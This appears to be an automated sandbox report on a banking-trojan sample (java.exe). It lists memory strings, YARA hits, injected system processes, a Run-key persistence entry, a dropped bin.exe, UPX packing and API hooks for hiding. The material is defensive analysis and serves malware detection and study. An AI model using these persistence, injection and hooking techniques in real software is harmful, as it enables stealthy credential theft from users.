            Source: SearchApp.exe, 0000000B.00000000.1829269370.0000024B55240000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1797450893.0000024B44184000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/weather?OCID=WSB_QS_WE&PC=wsbmsnqs
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com:443/en-us/feed
            Source: SearchApp.exe, 0000000B.00000000.1771563723.0000024B4248E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.ng.com
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
            Source: svchost.exe, 00000005.00000002.2922265482.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1715147840.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1771563723.0000024B4248E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://xsts.auth.xboxlive.com
            Source: svchost.exe, 00000005.00000002.2922265482.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1715147840.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://xsts.auth.xboxlive.com/
            Source: unknown | Network traffic detected: HTTP traffic on port 49675 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49672 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknown | HTTPS traffic detected: 173.222.162.32:443 -> 192.168.2.4:49730 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            Source: Yara match | File source: Process Memory Space: java.exe PID: 7340, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: winver.exe PID: 7396, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: sihost.exe PID: 3420, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: svchost.exe PID: 3456, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: svchost.exe PID: 3528, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: ctfmon.exe PID: 3832, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: svchost.exe PID: 4196, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: StartMenuExperienceHost.exe PID: 4660, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4872, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: SearchApp.exe PID: 4984, type: MEMORYSTR

            E-Banking Fraud

            Source: Yara match | File source: Process Memory Space: java.exe PID: 7340, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: winver.exe PID: 7396, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: sihost.exe PID: 3420, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: svchost.exe PID: 3456, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: svchost.exe PID: 3528, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: ctfmon.exe PID: 3832, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: svchost.exe PID: 4196, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: StartMenuExperienceHost.exe PID: 4660, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4872, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: SearchApp.exe PID: 4984, type: MEMORYSTR
            Source: C:\Windows\explorer.exe | Code function: 3_2_01342270 NtQueryDirectoryFile
            Source: C:\Windows\explorer.exe | Code function: 3_2_01341EE1 NtCreateUserProcess
            Source: C:\Windows\System32\sihost.exe | Code function: 4_2_00AC21D1 NtEnumerateValueKey
            Source: C:\Users\user\Desktop\java.exe | Code function: 0_2_02230005
            Source: C:\Users\user\Desktop\java.exe | Code function: 0_2_02231845
            Source: C:\Users\user\Desktop\java.exe | Code function: 0_2_02230EA9
            Source: C:\Windows\SysWOW64\winver.exe | Code function: 2_2_03391821
            Source: C:\Windows\SysWOW64\winver.exe | Code function: 2_2_03390E85
            Source: C:\Windows\explorer.exe | Code function: 3_2_01341821
            Source: C:\Windows\explorer.exe | Code function: 3_2_01340E85
            Source: C:\Windows\explorer.exe | Code function: 3_2_01371821
            Source: C:\Windows\explorer.exe | Code function: 3_2_01370E85
            Source: C:\Windows\System32\sihost.exe | Code function: 4_2_00AC0E85
            Source: C:\Windows\System32\sihost.exe | Code function: 4_2_00AC1821
            Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00910E85
            Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00911821
            Source: C:\Windows\System32\svchost.exe | Code function: 6_2_009A0E85
            Source: C:\Windows\System32\svchost.exe | Code function: 6_2_009A1821
            Source: C:\Windows\System32\ctfmon.exe | Code function: 7_2_00A50E85
            Source: C:\Windows\System32\ctfmon.exe | Code function: 7_2_00A51821
            Source: C:\Windows\System32\svchost.exe | Code function: 8_2_00D40E85
            Source: C:\Windows\System32\svchost.exe | Code function: 8_2_00D41821
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | Code function: 9_2_00B50E85
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | Code function: 9_2_00B51821
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 10_2_00111821
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 10_2_00110E85
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe | Code function: 13_2_001C1821
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe | Code function: 13_2_001C0E85
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe | Code function: 13_2_02300005
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe | Code function: 13_2_02300EA9
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 15_2_00AB0E85
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 15_2_00AB1821
            Source: C:\Windows\System32\smartscreen.exe | Code function: 16_2_00291821
            Source: C:\Windows\System32\smartscreen.exe | Code function: 16_2_00290E85
            Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe | Code function: 19_2_00581821
            Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe | Code function: 19_2_00580E85
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe | Code function: 20_2_001C1821
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe | Code function: 20_2_001C0E85
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe | Code function: 20_2_022A0005
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe | Code function: 20_2_022A0EA9
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 22_2_003D1821
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 22_2_003D0E85
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 23_2_00900E85
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 23_2_00901821
            Source: C:\Windows\System32\ApplicationFrameHost.exe | Code function: 24_2_00181821
            Source: C:\Windows\System32\ApplicationFrameHost.exe | Code function: 24_2_00180E85
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 26_2_00191821
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 26_2_00190E85
            Source: C:\Windows\System32\oobe\UserOOBEBroker.exe | Code function: 28_2_00011821
            Source: C:\Windows\System32\oobe\UserOOBEBroker.exe | Code function: 28_2_00010E85
            Source: C:\Windows\System32\svchost.exe | Code function: 29_2_000D1821
            Source: C:\Windows\System32\svchost.exe | Code function: 29_2_000D0E85
            Source: C:\Windows\System32\dllhost.exe | Code function: 30_2_00261821
            Source: C:\Windows\System32\dllhost.exe | Code function: 30_2_00260E85
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 31_2_04D80E85
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 31_2_04D81821
            Source: C:\Windows\System32\conhost.exe | Code function: 32_2_00880E85
            Source: C:\Windows\System32\conhost.exe | Code function: 32_2_00881821
            Source: C:\Windows\System32\conhost.exe | Code function: 33_2_00900E85
            Source: C:\Windows\System32\conhost.exe | Code function: 33_2_00901821
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 35_2_00890E85
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 35_2_00891821
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 36_2_00031821
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 36_2_00030E85
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | Code function: 37_2_01531821
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | Code function: 37_2_01530E85
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | Code function: 38_2_02771821
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | Code function: 38_2_02770E85
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | Code function: 39_2_00B80E85
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | Code function: 39_2_00B81821
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | Code function: 40_2_008B0E85
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | Code function: 40_2_008B1821
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | Code function: 41_2_00B50E85
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | Code function: 41_2_00B51821
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | Code function: 42_2_02EB0E85
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | Code function: 42_2_02EB1821
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | Code function: 43_2_02D10E85
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | Code function: 43_2_02D11821
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | Code function: 44_2_02B40E85
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | Code function: 44_2_02B41821
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | Code function: 45_2_02E20E85
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | Code function: 45_2_02E21821
            Source: C:\Windows\System32\conhost.exe | Code function: String function: 00883653 appears 35 times
            Source: C:\Windows\System32\conhost.exe | Code function: String function: 00903653 appears 35 times
            Source: C:\Windows\SysWOW64\winver.exe | Code function: String function: 03393653 appears 35 times
            Source: C:\Windows\System32\svchost.exe | Code function: String function: 00913653 appears 35 times
            Source: C:\Windows\System32\svchost.exe | Code function: String function: 009A3653 appears 35 times
            Source: C:\Windows\System32\svchost.exe | Code function: String function: 00D43653 appears 35 times
            Source: C:\Windows\System32\svchost.exe | Code function: String function: 000D3653 appears 35 times
            Source: C:\Windows\System32\ctfmon.exe | Code function: String function: 00A53653 appears 35 times
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe | Code function: String function: 02303677 appears 34 times
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe | Code function: String function: 001C3653 appears 70 times
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe | Code function: String function: 022A3677 appears 34 times
            Source: C:\Windows\explorer.exe | Code function: String function: 01373653 appears 35 times
            Source: C:\Windows\explorer.exe | Code function: String function: 01343653 appears 34 times
            Source: C:\Windows\System32\ApplicationFrameHost.exe | Code function: String function: 00183653 appears 35 times
            Source: C:\Windows\System32\oobe\UserOOBEBroker.exe | Code function: String function: 00013653 appears 35 times
            Source: C:\Windows\System32\smartscreen.exe | Code function: String function: 00293653 appears 35 times
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | Code function: String function: 00B83653 appears 35 times
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | Code function: String function: 02EB3653 appears 35 times
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | Code function: String function: 01533653 appears 35 times
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | Code function: String function: 02D13653 appears 35 times
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | Code function: String function: 008B3653 appears 35 times
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | Code function: String function: 02E23653 appears 35 times
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | Code function: String function: 02B43653 appears 35 times
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | Code function: String function: 02773653 appears 35 times
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | Code function: String function: 00B53653 appears 35 times
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | Code function: String function: 00B53653 appears 35 times
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: String function: 00193653 appears 35 times
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: String function: 003D3653 appears 35 times
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: String function: 00113653 appears 35 times
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: String function: 00903653 appears 35 times
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: String function: 00AB3653 appears 35 times
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: String function: 00893653 appears 35 times
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: String function: 00033653 appears 35 times
            Source: C:\Windows\System32\sihost.exe | Code function: String function: 00AC3653 appears 35 times
            Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe | Code function: String function: 00583653 appears 35 times
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: String function: 04D83653 appears 35 times
            Source: C:\Windows\System32\dllhost.exe | Code function: String function: 00263653 appears 35 times
            Source: C:\Users\user\Desktop\java.exe | Code function: String function: 02233677 appears 34 times
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe | Section loaded: nss3.dll
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe | Section loaded: nss3.dll
            Source: C:\Windows\SysWOW64\cscript.exe | Section loaded: nss3.dll
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | Section loaded: nss3.dll
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | Section loaded: nss3.dll
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | Section loaded: nss3.dll
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | Section loaded: nss3.dll
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | Section loaded: nss3.dll
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | Section loaded: nss3.dll
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | Section loaded: nss3.dll
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | Section loaded: nss3.dll
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | Section loaded: nss3.dll
            Source: java.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
            Source: classification engine | Classification label: mal100.bank.expl.evad.winEXE@10/10@9/3
            Source: C:\Users\user\Desktop\java.exe | Code function: 0_2_02230005 ExitProcess,GetProcAddress,IsWow64Process,GetModuleHandleW,GetStartupInfoA,ReadFile,WriteFile,SetFilePointer,CloseHandle,CreateToolhelp32Snapshot,Process32Next,OpenProcess,VirtualFree,VirtualAllocEx,CreateMutexA
            Source: C:\Windows\SysWOW64\winver.exe | File created: C:\Users\user\AppData\Local\Packages\windows_ie_ac_001\AC\0C0BC82C
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7708:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7936:120:WilError_03
            Source: C:\Windows\SysWOW64\winver.exe | Mutant created: \Sessions\1\BaseNamedObjects\0C0BC82C
            Source: C:\Windows\explorer.exe | File read: C:\Users\user\Searches\desktop.ini
            Source: C:\Users\user\Desktop\java.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: java.exe | ReversingLabs: Detection: 89%
            Source: java.exe | Virustotal: Detection: 89%
            Source: unknown | Process created: C:\Users\user\Desktop\java.exe C:\Users\user\Desktop\java.exe
            Source: C:\Users\user\Desktop\java.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\java.exe | Process created: C:\Windows\SysWOW64\winver.exe winver
            Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe "C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe"
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe "C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe"
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\java.exe | Process created: C:\Windows\SysWOW64\winver.exe winver
            Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe "C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe"
            Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe "C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe"
            Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: java.exe | Static PE information: section name: .imports
            Source: bin.exe.2.dr | Static PE information: section name: .imports
            Source: C:\Users\user\Desktop\java.exe | Code function: 0_2_02230C1A push edi; ret 0_2_02230C56
            Source: C:\Users\user\Desktop\java.exe | Code function: 0_2_02230B89 push edi; ret 0_2_02230C56
            Source: C:\Windows\SysWOW64\winver.exe | Code function: 2_2_03390B65 push edi; ret 2_2_03390C32
            Source: C:\Windows\SysWOW64\winver.exe | Code function: 2_2_03390BF6 push edi; ret 2_2_03390C32
            Source: C:\Windows\explorer.exe | Code function: 3_2_01340B65 push edi; ret 3_2_01340C32
            Source: C:\Windows\explorer.exe | Code function: 3_2_01340BF6 push edi; ret 3_2_01340C32
            Source: C:\Windows\explorer.exe | Code function: 3_2_01370B65 push edi; ret 3_2_01370C32
            Source: C:\Windows\explorer.exe | Code function: 3_2_01370BF6 push edi; ret 3_2_01370C32
            Source: C:\Windows\System32\sihost.exe | Code function: 4_2_00AC0BF6 push edi; ret 4_2_00AC0C32
            Source: C:\Windows\System32\sihost.exe | Code function: 4_2_00AC0B65 push edi; ret 4_2_00AC0C32
            Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00910BF6 push edi; ret 5_2_00910C32
            Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00910B65 push edi; ret 5_2_00910C32
            Source: C:\Windows\System32\svchost.exe | Code function: 6_2_009A0BF6 push edi; ret 6_2_009A0C32
            Source: C:\Windows\System32\svchost.exe | Code function: 6_2_009A0B65 push edi; ret 6_2_009A0C32
            Source: C:\Windows\System32\ctfmon.exe | Code function: 7_2_00A50BF6 push edi; ret 7_2_00A50C32
            Source: C:\Windows\System32\ctfmon.exe | Code function: 7_2_00A50B65 push edi; ret 7_2_00A50C32
            Source: C:\Windows\System32\svchost.exe | Code function: 8_2_00D40BF6 push edi; ret 8_2_00D40C32
            Source: C:\Windows\System32\svchost.exe | Code function: 8_2_00D40B65 push edi; ret 8_2_00D40C32
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | Code function: 9_2_00B50BF6 push edi; ret 9_2_00B50C32
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | Code function: 9_2_00B50B65 push edi; ret 9_2_00B50C32
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 10_2_00110B65 push edi; ret 10_2_00110C32
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 10_2_00110BF6 push edi; ret 10_2_00110C32
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe | Code function: 13_2_001C0B65 push edi; ret 13_2_001C0C32
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe | Code function: 13_2_001C0BF6 push edi; ret 13_2_001C0C32
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe | Code function: 13_2_02300C1A push edi; ret 13_2_02300C56
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe | Code function: 13_2_02301A92 push esi; ret 13_2_02301A94
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe | Code function: 13_2_02301B61 push esi; ret 13_2_02301B63
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe | Code function: 13_2_02300B89 push edi; ret 13_2_02300C56
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 15_2_00AB0BF6 push edi; ret 15_2_00AB0C32
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 15_2_00AB0B65 push edi; ret 15_2_00AB0C32
            Source: C:\Windows\System32\smartscreen.exe | Code function: 16_2_00290B65 push edi; ret 16_2_00290C32
            Source: initial sample | Static PE information: section name: UPX0
            Source: initial sample | Static PE information: section name: UPX1
            Source: initial sample | Static PE information: section name: UPX0
            Source: initial sample | Static PE information: section name: UPX1
            Source: C:\Windows\SysWOW64\winver.exe | File created: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe

            Boot Survival

            Source: C:\Windows\SysWOW64\winver.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0C0BC82C
            Source: C:\Windows\SysWOW64\winver.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0C0BC82C
            Source: C:\Windows\SysWOW64\winver.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0C0BC82C

            Hooking and other Techniques for Hiding and Protection

            Source: explorer.exe | IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
            Source: explorer.exe | IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
            Source: explorer.exe | User mode code has changed: module: ntdll.dll function: ZwResumeThread new code: 0xE9 0x9E 0xE1 0x12 0x25 0x51
            Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
